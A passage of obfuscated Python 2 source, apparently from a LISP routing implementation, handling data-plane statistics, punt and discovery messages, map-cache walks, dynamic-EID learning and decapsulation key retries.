if ( commands . getoutput ( OoOoOoo0OoO0 ) != "" ) : return ( True )
if 72 - 72: OOooOOo * Ii1I % OoO0O00
if ( os . getenv ( "LISP_RUN_LISP_XTR" ) != None ) : return ( True )
return ( False )
if 72 - 72: OoOoOO00 + o0oOOo0O0Ooo - i1IIi - OoO0O00 % OoOoOO00
if 42 - 42: oO0o / i1IIi . IiII
if 12 - 12: i11iIiiIii . ooOoO0o
if 80 - 80: O0 / iIii1I11I1II1 % iII111i * ooOoO0o / i11iIiiIii . OoOoOO00
if 88 - 88: OoooooooOO . I1IiiI
if 6 - 6: I1Ii111 - i11iIiiIii - oO0o
if 7 - 7: i1IIi
if 6 - 6: OoooooooOO - Oo0Ooo - I1ii11iIi11i
if 34 - 34: iII111i + i11iIiiIii . IiII
if 54 - 54: Oo0Ooo + I11i - iII111i * ooOoO0o % i11iIiiIii . IiII
if 29 - 29: II111iiii % i11iIiiIii % O0
if 38 - 38: o0oOOo0O0Ooo * IiII
if 51 - 51: OoooooooOO . Ii1I % OoooooooOO - I1IiiI + I1Ii111 % oO0o
if 28 - 28: i11iIiiIii - I1IiiI * OoO0O00
def lisp_process_data_plane_restart ( do_clear = False ) :
os . system ( "touch ./lisp.config" )
if 19 - 19: OoooooooOO
iII = { "type" : "entire-map-cache" , "entries" : [ ] }
if 53 - 53: oO0o + OoooooooOO * ooOoO0o
if ( do_clear == False ) :
iiIi1 = iII [ "entries" ]
lisp_map_cache . walk_cache ( lisp_ipc_walk_map_cache , iiIi1 )
if 85 - 85: I1ii11iIi11i - o0oOOo0O0Ooo % o0oOOo0O0Ooo % iII111i * OoOoOO00
if 50 - 50: I1Ii111 + I1Ii111 + I11i - OoOoOO00
lisp_write_to_dp_socket ( iII )
return
if 65 - 65: oO0o / I11i + iII111i - I1ii11iIi11i
if 80 - 80: II111iiii . i11iIiiIii
if 66 - 66: ooOoO0o * iII111i * OOooOOo % OoO0O00 / I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 52 - 52: iIii1I11I1II1 + O0
if 84 - 84: OOooOOo / iII111i . I1IiiI / O0 % OOooOOo . iII111i
if 32 - 32: OoO0O00 + OoO0O00 % o0oOOo0O0Ooo / O0
if 29 - 29: iII111i % I1Ii111
if 95 - 95: OOooOOo - ooOoO0o % i1IIi / O0 % I11i . IiII
if 63 - 63: ooOoO0o
if 22 - 22: OOooOOo . i11iIiiIii + II111iiii - Oo0Ooo % i1IIi / o0oOOo0O0Ooo
if 90 - 90: IiII
if 38 - 38: i1IIi / ooOoO0o / I11i * I1ii11iIi11i / II111iiii . iIii1I11I1II1
if 52 - 52: I1ii11iIi11i % ooOoO0o * Ii1I * IiII + IiII / i11iIiiIii
def lisp_process_data_plane_stats ( msg , lisp_sockets , lisp_port ) :
if ( msg . has_key ( "entries" ) == False ) :
lprint ( "No 'entries' in stats IPC message" )
return
if 51 - 51: iIii1I11I1II1 * o0oOOo0O0Ooo % o0oOOo0O0Ooo . Ii1I / OoooooooOO
if ( type ( msg [ "entries" ] ) != list ) :
lprint ( "'entries' in stats IPC message must be an array" )
return
if 23 - 23: oO0o * I1IiiI - oO0o - ooOoO0o . IiII / i11iIiiIii
if 53 - 53: Ii1I * Ii1I . OoOoOO00 . OOooOOo / I1ii11iIi11i % O0
for msg in msg [ "entries" ] :
if ( msg . has_key ( "eid-prefix" ) == False ) :
lprint ( "No 'eid-prefix' in stats IPC message" )
continue
if 98 - 98: OOooOOo
iiI1Ii1I = msg [ "eid-prefix" ]
if 11 - 11: OOooOOo * iIii1I11I1II1 % IiII - I1IiiI . I11i
if ( msg . has_key ( "instance-id" ) == False ) :
lprint ( "No 'instance-id' in stats IPC message" )
continue
if 29 - 29: OOooOOo % I11i - OOooOOo - OOooOOo * I11i . oO0o
oOo00Ooo0o0 = int ( msg [ "instance-id" ] )
if 75 - 75: II111iiii . O0 . I1Ii111 * O0 / OoooooooOO
if 60 - 60: OOooOOo - Oo0Ooo * OOooOOo / OoO0O00
if 55 - 55: I1ii11iIi11i * II111iiii * iIii1I11I1II1
if 38 - 38: iIii1I11I1II1 % I1ii11iIi11i . Ii1I + I1IiiI % i11iIiiIii - i11iIiiIii
I111o0oooO00o0 = lisp_address ( LISP_AFI_NONE , "" , 0 , oOo00Ooo0o0 )
I111o0oooO00o0 . store_prefix ( iiI1Ii1I )
OoOoooooO00oo = lisp_map_cache_lookup ( None , I111o0oooO00o0 )
if ( OoOoooooO00oo == None ) :
lprint ( "Map-cache entry for {} not found for stats update" . format ( iiI1Ii1I ) )
if 62 - 62: I1Ii111 + I1IiiI
continue
if 9 - 9: iIii1I11I1II1 / iIii1I11I1II1
if 24 - 24: OOooOOo . I1IiiI % i11iIiiIii
if ( msg . has_key ( "rlocs" ) == False ) :
lprint ( "No 'rlocs' in stats IPC message for {}" . format ( iiI1Ii1I ) )
if 43 - 43: OoooooooOO . o0oOOo0O0Ooo - I1ii11iIi11i + OoO0O00 . I1Ii111 . iII111i
continue
if 1 - 1: iII111i / OoO0O00 / OoOoOO00 * Oo0Ooo * OoooooooOO
if ( type ( msg [ "rlocs" ] ) != list ) :
lprint ( "'rlocs' in stats IPC message must be an array" )
continue
if 59 - 59: iII111i
IIIiiI11ii = msg [ "rlocs" ]
if 30 - 30: iII111i . OoO0O00 . i11iIiiIii / I1ii11iIi11i * Oo0Ooo
if 38 - 38: IiII + II111iiii
if 20 - 20: iII111i * I1IiiI * iII111i - o0oOOo0O0Ooo + i1IIi + ooOoO0o
if 49 - 49: II111iiii * I1IiiI / oO0o
for I1ii1II in IIIiiI11ii :
if ( I1ii1II . has_key ( "rloc" ) == False ) : continue
if 15 - 15: Oo0Ooo
ii11IiI = I1ii1II [ "rloc" ]
if ( ii11IiI == "no-address" ) : continue
if 53 - 53: OoooooooOO * O0 / iII111i * ooOoO0o % I1Ii111 + OOooOOo
OooO0ooO0o0OO = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
OooO0ooO0o0OO . store_address ( ii11IiI )
if 95 - 95: I1Ii111 % OoOoOO00 . IiII * iII111i % Ii1I
IiIIIi = OoOoooooO00oo . get_rloc ( OooO0ooO0o0OO )
if ( IiIIIi == None ) : continue
if 18 - 18: iIii1I11I1II1 / ooOoO0o / I1Ii111 % oO0o * Ii1I
if 14 - 14: oO0o
if 72 - 72: iIii1I11I1II1 / II111iiii * II111iiii + I1IiiI + iIii1I11I1II1 + oO0o
if 46 - 46: I1Ii111
III1i1i1iIIi = 0 if I1ii1II . has_key ( "packet-count" ) == False else I1ii1II [ "packet-count" ]
if 20 - 20: i1IIi
IiI1iiI11 = 0 if I1ii1II . has_key ( "byte-count" ) == False else I1ii1II [ "byte-count" ]
if 72 - 72: ooOoO0o . II111iiii
Oo0OO0000oooo = 0 if I1ii1II . has_key ( "seconds-last-packet" ) == False else I1ii1II [ "seconds-last-packet" ]
if 32 - 32: I1Ii111 - oO0o + OoooooooOO . OoOoOO00 + i11iIiiIii / i1IIi
if 26 - 26: I1IiiI + OoooooooOO % OoOoOO00 . IiII - II111iiii . OoOoOO00
IiIIIi . stats . packet_count += III1i1i1iIIi
IiIIIi . stats . byte_count += IiI1iiI11
IiIIIi . stats . last_increment = lisp_get_timestamp ( ) - Oo0OO0000oooo
if 37 - 37: OoO0O00 % O0 + OoOoOO00 * I11i . Ii1I * OoO0O00
lprint ( "Update stats {}/{}/{}s for {} RLOC {}" . format ( III1i1i1iIIi , IiI1iiI11 ,
Oo0OO0000oooo , iiI1Ii1I , ii11IiI ) )
if 18 - 18: o0oOOo0O0Ooo / OOooOOo
if 28 - 28: O0 / Ii1I - oO0o % I1ii11iIi11i % O0 . OoO0O00
if 100 - 100: O0
if 19 - 19: Ii1I * iIii1I11I1II1 * Oo0Ooo - i11iIiiIii * i11iIiiIii - OOooOOo
if 88 - 88: O0 . iIii1I11I1II1 . I1ii11iIi11i
if ( OoOoooooO00oo . group . is_null ( ) and OoOoooooO00oo . has_ttl_elapsed ( ) ) :
iiI1Ii1I = green ( OoOoooooO00oo . print_eid_tuple ( ) , False )
lprint ( "Refresh map-cache entry {}" . format ( iiI1Ii1I ) )
lisp_send_map_request ( lisp_sockets , lisp_port , None , OoOoooooO00oo . eid , None )
if 80 - 80: oO0o / i1IIi * iIii1I11I1II1
if 38 - 38: Ii1I
return
if 20 - 20: iIii1I11I1II1 + Oo0Ooo - Ii1I / i11iIiiIii . OoO0O00
if 66 - 66: OoooooooOO - Ii1I / iII111i . I1IiiI + I1ii11iIi11i - I1Ii111
if 36 - 36: I1Ii111 - OoO0O00 . I1ii11iIi11i * I1ii11iIi11i
if 9 - 9: OOooOOo - oO0o - iIii1I11I1II1 * i11iIiiIii / I11i
if 2 - 2: i1IIi % iII111i * ooOoO0o / OoOoOO00 + Oo0Ooo
if 59 - 59: i11iIiiIii / I1IiiI * iII111i
if 16 - 16: i11iIiiIii * II111iiii - ooOoO0o
if 80 - 80: iIii1I11I1II1 + iIii1I11I1II1 + I1Ii111 - IiII * iII111i - Ii1I
if 89 - 89: O0 * ooOoO0o
if 36 - 36: I1ii11iIi11i * II111iiii * iII111i + I1IiiI + OoO0O00 + oO0o
if 28 - 28: Ii1I - i11iIiiIii . oO0o / II111iiii
if 82 - 82: iII111i * iII111i . IiII * II111iiii
if 17 - 17: OoooooooOO % I1Ii111 * I1Ii111 / II111iiii . OoOoOO00 * iII111i
if 80 - 80: IiII % i11iIiiIii
if 6 - 6: II111iiii + i11iIiiIii - Oo0Ooo % OOooOOo + Oo0Ooo
if 46 - 46: iII111i
if 31 - 31: OoO0O00 + I1Ii111 / iIii1I11I1II1
if 11 - 11: ooOoO0o - OoOoOO00
if 19 - 19: O0 . OoOoOO00 - i1IIi . oO0o
if 96 - 96: o0oOOo0O0Ooo % o0oOOo0O0Ooo - OoO0O00 * iIii1I11I1II1 + ooOoO0o - ooOoO0o
if 4 - 4: OoO0O00 - OOooOOo
if 21 - 21: I1Ii111 * i11iIiiIii
if 63 - 63: oO0o + OoOoOO00
def lisp_process_data_plane_decap_stats ( msg , lisp_ipc_socket ) :
if 50 - 50: o0oOOo0O0Ooo / Oo0Ooo * ooOoO0o * Ii1I
if 97 - 97: I1IiiI / oO0o + I1Ii111 + I1Ii111
if 86 - 86: o0oOOo0O0Ooo % ooOoO0o + OoOoOO00 * ooOoO0o
if 20 - 20: Ii1I * iII111i / ooOoO0o
if 18 - 18: Oo0Ooo * Ii1I / i11iIiiIii . OoO0O00 + OoooooooOO
if ( lisp_i_am_itr ) :
lprint ( "Send decap-stats IPC message to lisp-etr process" )
oOO0O = "stats%{}" . format ( json . dumps ( msg ) )
oOO0O = lisp_command_ipc ( oOO0O , "lisp-itr" )
lisp_ipc ( oOO0O , lisp_ipc_socket , "lisp-etr" )
return
if 23 - 23: I1IiiI - I1ii11iIi11i . O0 . OoOoOO00 . OoO0O00
if 81 - 81: IiII * I11i - iIii1I11I1II1
if 41 - 41: oO0o * I11i + I1IiiI - OoO0O00
if 63 - 63: Oo0Ooo * Ii1I - Ii1I
if 76 - 76: OoO0O00 . IiII % iIii1I11I1II1 / I1IiiI + iIii1I11I1II1 . I1IiiI
if 57 - 57: IiII - i1IIi * ooOoO0o
if 5 - 5: oO0o . O0 * IiII / Ii1I + OoO0O00
if 75 - 75: OOooOOo * OoOoOO00
oOO0O = bold ( "IPC" , False )
lprint ( "Process decap-stats {} message: '{}'" . format ( oOO0O , msg ) )
if 82 - 82: Ii1I
if ( lisp_i_am_etr ) : msg = json . loads ( msg )
if 83 - 83: I1IiiI
I1I1 = [ "good-packets" , "ICV-error" , "checksum-error" ,
"lisp-header-error" , "no-decrypt-key" , "bad-inner-version" ,
"outer-header-error" ]
if 67 - 67: I11i . I11i % I11i + Ii1I + Oo0Ooo - I1ii11iIi11i
for oO0oi1iIIIi in I1I1 :
III1i1i1iIIi = 0 if msg . has_key ( oO0oi1iIIIi ) == False else msg [ oO0oi1iIIIi ] [ "packet-count" ]
if 76 - 76: i11iIiiIii * oO0o / I1IiiI
lisp_decap_stats [ oO0oi1iIIIi ] . packet_count += III1i1i1iIIi
if 10 - 10: iII111i * iIii1I11I1II1 % OoO0O00 * ooOoO0o
IiI1iiI11 = 0 if msg . has_key ( oO0oi1iIIIi ) == False else msg [ oO0oi1iIIIi ] [ "byte-count" ]
if 10 - 10: OoOoOO00
lisp_decap_stats [ oO0oi1iIIIi ] . byte_count += IiI1iiI11
if 97 - 97: OOooOOo
Oo0OO0000oooo = 0 if msg . has_key ( oO0oi1iIIIi ) == False else msg [ oO0oi1iIIIi ] [ "seconds-last-packet" ]
if 86 - 86: i11iIiiIii
lisp_decap_stats [ oO0oi1iIIIi ] . last_increment = lisp_get_timestamp ( ) - Oo0OO0000oooo
if 45 - 45: OoooooooOO + II111iiii + iIii1I11I1II1 % O0 % OOooOOo + i1IIi
return
if 51 - 51: oO0o / ooOoO0o - OOooOOo + oO0o
if 28 - 28: OoOoOO00 % I11i + o0oOOo0O0Ooo
if 51 - 51: iIii1I11I1II1 + I1ii11iIi11i % OoooooooOO + Ii1I
if 20 - 20: O0 * I1ii11iIi11i + OoOoOO00 * OOooOOo . i1IIi . o0oOOo0O0Ooo
if 26 - 26: OOooOOo - OoOoOO00 + I1ii11iIi11i + OoO0O00 - OoOoOO00 / o0oOOo0O0Ooo
if 76 - 76: I1ii11iIi11i / oO0o + Ii1I - O0
if 95 - 95: OoOoOO00
if 69 - 69: iII111i / Ii1I
if 83 - 83: oO0o
if 1 - 1: oO0o * iIii1I11I1II1 % iIii1I11I1II1 % iIii1I11I1II1 / oO0o + IiII
if 29 - 29: OoooooooOO
if 55 - 55: O0 - o0oOOo0O0Ooo % I1ii11iIi11i * I11i * oO0o
if 83 - 83: iIii1I11I1II1
if 92 - 92: OoO0O00 - iII111i
if 97 - 97: ooOoO0o / I11i . IiII + I1Ii111 . iIii1I11I1II1
if 24 - 24: ooOoO0o - oO0o % OoOoOO00 * Oo0Ooo
if 54 - 54: Ii1I - OoooooooOO % I1IiiI + oO0o
def lisp_process_punt ( punt_socket , lisp_send_sockets , lisp_ephem_port ) :
o0o0O0oOoO , O0O00Oo = punt_socket . recvfrom ( 4000 )
if 94 - 94: OoO0O00 * I1IiiI / O0 + I1Ii111 / i11iIiiIii
i11Ii = json . loads ( o0o0O0oOoO )
if ( type ( i11Ii ) != dict ) :
lprint ( "Invalid punt message from {}, not in JSON format" . format ( O0O00Oo ) )
if 34 - 34: Oo0Ooo . i1IIi
return
if 97 - 97: I11i
o0oOOoo0OO0 = bold ( "Punt" , False )
lprint ( "{} message from '{}': '{}'" . format ( o0oOOoo0OO0 , O0O00Oo , i11Ii ) )
if 52 - 52: iII111i - II111iiii % i1IIi / iII111i
if ( i11Ii . has_key ( "type" ) == False ) :
lprint ( "Punt IPC message has no 'type' key" )
return
if 14 - 14: oO0o / I1Ii111 / IiII - i1IIi * Ii1I
if 90 - 90: ooOoO0o
if 100 - 100: iII111i * i1IIi . iII111i / O0 / OoO0O00 - oO0o
if 65 - 65: OoOoOO00 + ooOoO0o * OoO0O00 % OoooooooOO + OoooooooOO * OoooooooOO
if 49 - 49: o0oOOo0O0Ooo + i1IIi / iII111i
if ( i11Ii [ "type" ] == "statistics" ) :
lisp_process_data_plane_stats ( i11Ii , lisp_send_sockets , lisp_ephem_port )
return
if 43 - 43: i1IIi . OoO0O00 + I1ii11iIi11i
if ( i11Ii [ "type" ] == "decap-statistics" ) :
lisp_process_data_plane_decap_stats ( i11Ii , punt_socket )
return
if 88 - 88: OoooooooOO / I11i % II111iiii % OOooOOo - I11i
if 55 - 55: Oo0Ooo - OOooOOo - O0
if 40 - 40: OoOoOO00 - OOooOOo
if 3 - 3: IiII % I11i * I1Ii111 + iIii1I11I1II1 . oO0o
if 35 - 35: II111iiii
if ( i11Ii [ "type" ] == "restart" ) :
lisp_process_data_plane_restart ( )
return
if 15 - 15: I11i * iIii1I11I1II1 + OOooOOo % IiII . o0oOOo0O0Ooo % Oo0Ooo
if 96 - 96: O0
if 15 - 15: i1IIi . iIii1I11I1II1
if 3 - 3: II111iiii * i11iIiiIii * i1IIi - i1IIi
if 11 - 11: I1IiiI % Ii1I * i11iIiiIii % OOooOOo + II111iiii
if ( i11Ii [ "type" ] != "discovery" ) :
lprint ( "Punt IPC message has wrong format" )
return
if 61 - 61: I1Ii111 + I11i + I1IiiI
if ( i11Ii . has_key ( "interface" ) == False ) :
lprint ( "Invalid punt message from {}, required keys missing" . format ( O0O00Oo ) )
if 48 - 48: I11i
return
if 67 - 67: o0oOOo0O0Ooo
if 36 - 36: IiII - I11i - Ii1I / OoOoOO00 % OoO0O00 * iIii1I11I1II1
if 61 - 61: i11iIiiIii / Ii1I - OOooOOo . I1ii11iIi11i
if 89 - 89: ooOoO0o % i11iIiiIii
if 57 - 57: Oo0Ooo / ooOoO0o - O0 . ooOoO0o
OO0oo00oOO = i11Ii [ "interface" ]
if ( OO0oo00oOO == "" ) :
oOo00Ooo0o0 = int ( i11Ii [ "instance-id" ] )
if ( oOo00Ooo0o0 == - 1 ) : return
else :
oOo00Ooo0o0 = lisp_get_interface_instance_id ( OO0oo00oOO , None )
if 61 - 61: o0oOOo0O0Ooo / OoooooooOO . I1ii11iIi11i + Oo0Ooo
if 75 - 75: Ii1I
if 79 - 79: i1IIi . I1ii11iIi11i * o0oOOo0O0Ooo / I11i . I11i / ooOoO0o
if 99 - 99: oO0o + I11i % i1IIi . iII111i
if 58 - 58: Oo0Ooo % i11iIiiIii . Oo0Ooo / Oo0Ooo - I1IiiI . Ii1I
Oooo0OOO0oo0o = None
if ( i11Ii . has_key ( "source-eid" ) ) :
i1Iii = i11Ii [ "source-eid" ]
Oooo0OOO0oo0o = lisp_address ( LISP_AFI_NONE , i1Iii , 0 , oOo00Ooo0o0 )
if ( Oooo0OOO0oo0o . is_null ( ) ) :
lprint ( "Invalid source-EID format '{}'" . format ( i1Iii ) )
return
if 65 - 65: OoO0O00
if 16 - 16: IiII % I1IiiI % iIii1I11I1II1 . I1IiiI . I1ii11iIi11i - IiII
OOOoOO0o00o0o = None
if ( i11Ii . has_key ( "dest-eid" ) ) :
I1II1i = i11Ii [ "dest-eid" ]
OOOoOO0o00o0o = lisp_address ( LISP_AFI_NONE , I1II1i , 0 , oOo00Ooo0o0 )
if ( OOOoOO0o00o0o . is_null ( ) ) :
lprint ( "Invalid dest-EID format '{}'" . format ( I1II1i ) )
return
if 16 - 16: iIii1I11I1II1 . I1Ii111 * OoO0O00
if 78 - 78: iIii1I11I1II1 + I11i - OoOoOO00 / I1ii11iIi11i + iIii1I11I1II1 % II111iiii
if 55 - 55: I11i . iIii1I11I1II1 / Ii1I - OoO0O00 * I1ii11iIi11i % iIii1I11I1II1
if 48 - 48: ooOoO0o + Oo0Ooo / Oo0Ooo
if 15 - 15: iIii1I11I1II1 . I1Ii111 * OoooooooOO * O0 % OOooOOo
if 53 - 53: Ii1I
if 63 - 63: I11i % OoOoOO00
if 46 - 46: iIii1I11I1II1 . II111iiii / OoooooooOO - ooOoO0o * iII111i
if ( Oooo0OOO0oo0o ) :
o0OoO00 = green ( Oooo0OOO0oo0o . print_address ( ) , False )
o00o0oOo0o0O = lisp_db_for_lookups . lookup_cache ( Oooo0OOO0oo0o , False )
if ( o00o0oOo0o0O != None ) :
if 52 - 52: I11i + iII111i
if 9 - 9: OoOoOO00 % II111iiii . I11i * Oo0Ooo
if 53 - 53: II111iiii / i1IIi + OoooooooOO * O0
if 62 - 62: IiII . O0
if 87 - 87: I1ii11iIi11i / oO0o / IiII . OOooOOo
if ( o00o0oOo0o0O . dynamic_eid_configured ( ) ) :
I1i = lisp_allow_dynamic_eid ( OO0oo00oOO , Oooo0OOO0oo0o )
if ( I1i != None and lisp_i_am_itr ) :
lisp_itr_discover_eid ( o00o0oOo0o0O , Oooo0OOO0oo0o , OO0oo00oOO , I1i )
else :
lprint ( ( "Disallow dynamic source-EID {} " + "on interface {}" ) . format ( o0OoO00 , OO0oo00oOO ) )
if 91 - 91: OOooOOo % oO0o . OoOoOO00 . I1IiiI - OoOoOO00
if 18 - 18: O0 - I1IiiI + i1IIi % i11iIiiIii
if 97 - 97: iII111i * OoooooooOO + I1Ii111 + ooOoO0o - ooOoO0o
else :
lprint ( "Punt from non-EID source {}" . format ( o0OoO00 ) )
if 63 - 63: o0oOOo0O0Ooo * OOooOOo + iIii1I11I1II1 + Oo0Ooo
if 25 - 25: oO0o + IiII % o0oOOo0O0Ooo
if 24 - 24: OoOoOO00
if 87 - 87: I1ii11iIi11i / ooOoO0o * i1IIi
if 71 - 71: OoOoOO00 - I11i
if 83 - 83: oO0o + oO0o - Oo0Ooo . Oo0Ooo - iII111i . OOooOOo
if ( OOOoOO0o00o0o ) :
OoOoooooO00oo = lisp_map_cache_lookup ( Oooo0OOO0oo0o , OOOoOO0o00o0o )
if ( OoOoooooO00oo == None or OoOoooooO00oo . action == LISP_SEND_MAP_REQUEST_ACTION ) :
if 56 - 56: OoOoOO00 * IiII + i1IIi
if 40 - 40: I1ii11iIi11i / O0
if 87 - 87: ooOoO0o
if 100 - 100: iII111i + II111iiii * Oo0Ooo * OOooOOo
if 6 - 6: IiII % OOooOOo
if ( lisp_rate_limit_map_request ( Oooo0OOO0oo0o , OOOoOO0o00o0o ) ) : return
lisp_send_map_request ( lisp_send_sockets , lisp_ephem_port ,
Oooo0OOO0oo0o , OOOoOO0o00o0o , None )
else :
o0OoO00 = green ( OOOoOO0o00o0o . print_address ( ) , False )
lprint ( "Map-cache entry for {} already exists" . format ( o0OoO00 ) )
if 3 - 3: OoOoOO00 / OoOoOO00 - II111iiii
if 41 - 41: oO0o
return
if 12 - 12: I1IiiI + I1Ii111
if 66 - 66: I1Ii111 + OOooOOo + I1Ii111 . OoooooooOO * oO0o / OoO0O00
if 74 - 74: O0 % OOooOOo * OoOoOO00 / oO0o - Oo0Ooo
if 79 - 79: Ii1I + IiII
if 21 - 21: o0oOOo0O0Ooo * iII111i * o0oOOo0O0Ooo * o0oOOo0O0Ooo . Oo0Ooo
if 98 - 98: I1ii11iIi11i
if 58 - 58: IiII / i11iIiiIii % I11i
def lisp_ipc_map_cache_entry ( mc , jdata ) :
iIiiiIIiii = lisp_write_ipc_map_cache ( True , mc , dont_send = True )
jdata . append ( iIiiiIIiii )
return ( [ True , jdata ] )
if 74 - 74: OoooooooOO - I1ii11iIi11i + OOooOOo % IiII . o0oOOo0O0Ooo
if 21 - 21: Ii1I
if 72 - 72: I1Ii111 . OoooooooOO / I1Ii111 - Ii1I / I1ii11iIi11i * I1ii11iIi11i
if 72 - 72: IiII . Ii1I + OoooooooOO * OoOoOO00 + Oo0Ooo . iII111i
if 92 - 92: O0 * Ii1I - I1ii11iIi11i - IiII . OoO0O00 + I1IiiI
if 59 - 59: i1IIi * OOooOOo % Oo0Ooo
if 44 - 44: iIii1I11I1II1 . OOooOOo
if 57 - 57: II111iiii + I1Ii111
def lisp_ipc_walk_map_cache ( mc , jdata ) :
if 42 - 42: OoOoOO00 % O0
if 70 - 70: iIii1I11I1II1 * Oo0Ooo - I1IiiI / OoO0O00 + OoOoOO00
if 94 - 94: OoooooooOO + O0 * iIii1I11I1II1 * II111iiii
if 90 - 90: I11i + O0 / I1IiiI . oO0o / O0
if ( mc . group . is_null ( ) ) : return ( lisp_ipc_map_cache_entry ( mc , jdata ) )
if 46 - 46: O0 . O0 - oO0o . II111iiii * I1IiiI * Ii1I
if ( mc . source_cache == None ) : return ( [ True , jdata ] )
if 10 - 10: i1IIi + i1IIi . i1IIi - I1IiiI - I1IiiI
if 26 - 26: Ii1I * I11i / I11i
if 79 - 79: ooOoO0o / oO0o - oO0o / OoooooooOO
if 91 - 91: iIii1I11I1II1 - O0 * o0oOOo0O0Ooo * o0oOOo0O0Ooo . II111iiii
if 69 - 69: II111iiii - Oo0Ooo + i1IIi . II111iiii + o0oOOo0O0Ooo
jdata = mc . source_cache . walk_cache ( lisp_ipc_map_cache_entry , jdata )
return ( [ True , jdata ] )
if 20 - 20: OoooooooOO - OoO0O00 * ooOoO0o * OoOoOO00 / OOooOOo
if 64 - 64: O0 + iII111i / I11i * OoOoOO00 + o0oOOo0O0Ooo + I1Ii111
if 16 - 16: I11i
if 9 - 9: Ii1I / IiII * I11i - i11iIiiIii * I1ii11iIi11i / iII111i
if 61 - 61: O0 % iII111i
if 41 - 41: I1Ii111 * OoooooooOO
if 76 - 76: OoooooooOO * II111iiii . II111iiii / o0oOOo0O0Ooo - iII111i
def lisp_itr_discover_eid ( db , eid , input_interface , routed_interface ,
lisp_ipc_listen_socket ) :
iiI1Ii1I = eid . print_address ( )
if ( db . dynamic_eids . has_key ( iiI1Ii1I ) ) :
db . dynamic_eids [ iiI1Ii1I ] . last_packet = lisp_get_timestamp ( )
return
if 49 - 49: O0 . I1ii11iIi11i . OoOoOO00 . I1Ii111 % O0 . iIii1I11I1II1
if 19 - 19: iIii1I11I1II1
if 97 - 97: Ii1I . I11i / ooOoO0o + Oo0Ooo
if 100 - 100: iII111i / I1Ii111 % OoOoOO00 . O0 / OoOoOO00
if 81 - 81: OoO0O00 % i11iIiiIii / OoO0O00 + ooOoO0o
O00o0 = lisp_dynamic_eid ( )
O00o0 . dynamic_eid . copy_address ( eid )
O00o0 . interface = routed_interface
O00o0 . last_packet = lisp_get_timestamp ( )
O00o0 . get_timeout ( routed_interface )
db . dynamic_eids [ iiI1Ii1I ] = O00o0
if 100 - 100: O0 . Oo0Ooo % Oo0Ooo % O0 / i11iIiiIii
O0O0OO0Oo = ""
if ( input_interface != routed_interface ) :
O0O0OO0Oo = ", routed-interface " + routed_interface
if 22 - 22: OoooooooOO / Ii1I % i11iIiiIii
if 27 - 27: iII111i / iII111i
i1I111i = green ( iiI1Ii1I , False ) + bold ( " discovered" , False )
lprint ( "Dynamic-EID {} on interface {}{}, timeout {}" . format ( i1I111i , input_interface , O0O0OO0Oo , O00o0 . timeout ) )
if 66 - 66: Ii1I / oO0o - ooOoO0o
if 6 - 6: I1IiiI - oO0o + OoO0O00
if 58 - 58: iIii1I11I1II1 + OoOoOO00
if 65 - 65: iII111i % Oo0Ooo * iIii1I11I1II1 + I1IiiI + II111iiii
if 72 - 72: OoOoOO00 . OoooooooOO - OOooOOo
oOO0O = "learn%{}%{}" . format ( iiI1Ii1I , routed_interface )
oOO0O = lisp_command_ipc ( oOO0O , "lisp-itr" )
lisp_ipc ( oOO0O , lisp_ipc_listen_socket , "lisp-etr" )
return
if 15 - 15: OoOoOO00
if 13 - 13: I1ii11iIi11i - OOooOOo - i11iIiiIii / IiII
if 65 - 65: IiII
if 76 - 76: I1Ii111 % I1ii11iIi11i + ooOoO0o / I1IiiI
if 59 - 59: OOooOOo - o0oOOo0O0Ooo - o0oOOo0O0Ooo % I1IiiI
if 55 - 55: o0oOOo0O0Ooo % I1ii11iIi11i - IiII + OoooooooOO
if 44 - 44: iII111i * I1Ii111 - I1IiiI % i1IIi
if 35 - 35: iII111i . OoOoOO00 + i1IIi . I1Ii111 - oO0o
if 92 - 92: o0oOOo0O0Ooo
if 8 - 8: i1IIi / IiII . O0
if 72 - 72: OOooOOo
if 20 - 20: i11iIiiIii + Oo0Ooo * Oo0Ooo % OOooOOo
if 66 - 66: I1ii11iIi11i + iII111i / Ii1I / I1IiiI * i11iIiiIii
def lisp_retry_decap_keys ( addr_str , packet , iv , packet_icv ) :
if ( lisp_search_decap_keys == False ) : return
if 41 - 41: Ii1I / Oo0Ooo . OoO0O00 . iIii1I11I1II1 % IiII . I11i
if 59 - 59: O0 + II111iiii + IiII % Oo0Ooo
if 71 - 71: oO0o
if 75 - 75: Oo0Ooo * oO0o + iIii1I11I1II1 / Oo0Ooo
if ( addr_str . find ( ":" ) != - 1 ) : return
if 51 - 51: Ii1I * Ii1I + iII111i * oO0o / OOooOOo - ooOoO0o
II1i1i = lisp_crypto_keys_by_rloc_decap [ addr_str ]
if 16 - 16: I1Ii111 + O0 - O0 * iIii1I11I1II1 / iII111i
for iII1 in lisp_crypto_keys_by_rloc_decap :
if 4 - 4: iII111i
if 75 - 75: I1IiiI * IiII % OoO0O00 - ooOoO0o * iII111i
if 32 - 32: iII111i
if 59 - 59: OoOoOO00 - I1Ii111
if ( iII1 . find ( addr_str ) == - 1 ) : continue
if 34 - 34: ooOoO0o . OoooooooOO / ooOoO0o + OoooooooOO
if 24 - 24: OoooooooOO * I1ii11iIi11i / O0 / Oo0Ooo * I1IiiI / ooOoO0o
if 33 - 33: Ii1I
if 20 - 20: Ii1I + I11i
if ( iII1 == addr_str ) : continue
if 98 - 98: OOooOOo
if 58 - 58: i11iIiiIii / OoOoOO00
if 18 - 18: ooOoO0o + O0 - OOooOOo + iIii1I11I1II1 . OOooOOo * iIii1I11I1II1
if 83 - 83: OoO0O00 - Oo0Ooo * I1IiiI % Oo0Ooo % oO0o
iIiiiIIiii = lisp_crypto_keys_by_rloc_decap [ iII1 ]
if ( iIiiiIIiii == II1i1i ) : continue
if 64 - 64: OoOoOO00 + oO0o / OoooooooOO . i11iIiiIii / II111iiii
if 55 - 55: ooOoO0o . i11iIiiIii . o0oOOo0O0Ooo
if 52 - 52: IiII . oO0o + i11iIiiIii % IiII
if 45 - 45: i1IIi - I1IiiI / IiII - I1IiiI
iIi1iI11I1i1 = iIiiiIIiii [ 1 ]
if ( packet_icv != iIi1iI11I1i1 . do_icv ( packet , iv ) ) :
lprint ( "Test ICV with key {} failed" . format ( red ( iII1 , False ) ) )
continue
if 93 - 93: II111iiii
if 85 - 85: O0 . II111iiii - Ii1I * I1ii11iIi11i / I1ii11iIi11i . OoOoOO00
lprint ( "Changing decap crypto key to {}" . format ( red ( iII1 , False ) ) )
lisp_crypto_keys_by_rloc_decap [ addr_str ] = iIiiiIIiii
